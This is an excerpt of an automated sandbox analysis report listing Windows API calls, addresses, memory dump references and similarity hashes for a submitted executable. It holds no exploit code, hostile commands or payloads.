                                                                                                    • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                                    • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                    • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                                      • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                    • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                                    • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                    • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 2087232378-0
                                                                                                    • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                    • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                    • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                    • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                    APIs
                                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                                      • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                                      • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1658689577-0
                                                                                                    • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                    • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                                    • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                    • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                                    APIs
                                                                                                    • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoScroll
                                                                                                    • String ID:
                                                                                                    • API String ID: 629608716-0
                                                                                                    • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                    • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                                    • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                    • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                      • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                    • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                                      • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                                      • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3319771486-0
                                                                                                    • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                    • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                                    • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                    • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                    • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                                    • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                    • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                    • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                                    • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                    • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                    • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                    • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                    • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                    • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                    • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                    • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                    • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                                    • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                    • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                                    APIs
                                                                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 1306739567-0
                                                                                                    • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                    • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                                    • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                    • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                                    APIs
                                                                                                    • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExtentPointText
                                                                                                    • String ID:
                                                                                                    • API String ID: 566491939-0
                                                                                                    • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                    • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                                    • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                    • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                    • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                                    • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                    • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                                    APIs
                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                    • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                                    • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                    • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                                    APIs
                                                                                                    • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                    • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                                    • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                    • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                    • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                    • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                    • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                    • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                                    • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
